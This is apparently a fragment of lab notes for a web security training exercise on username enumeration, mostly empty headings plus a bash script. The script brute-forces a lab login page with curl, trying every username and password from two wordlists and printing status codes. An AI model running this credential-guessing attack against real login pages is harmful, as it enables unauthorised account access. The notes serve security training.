π’Username enumeration via different responses
Candidate usernames
Candidate passwords






Alternative
Last updated
Candidate usernames
Candidate passwords






Last updated
#!/bin/bash
for u in `cat username.txt`
do
for p in `cat pwd.txt`
do
printf "$u:$p\n"
curl -F 'username'=$u -F 'password'=$p -s -o /dev/null -w "%{http_code}\n" https://0a8400790418dd1e827f97b900c600df.web-security-academy.net/login
done
done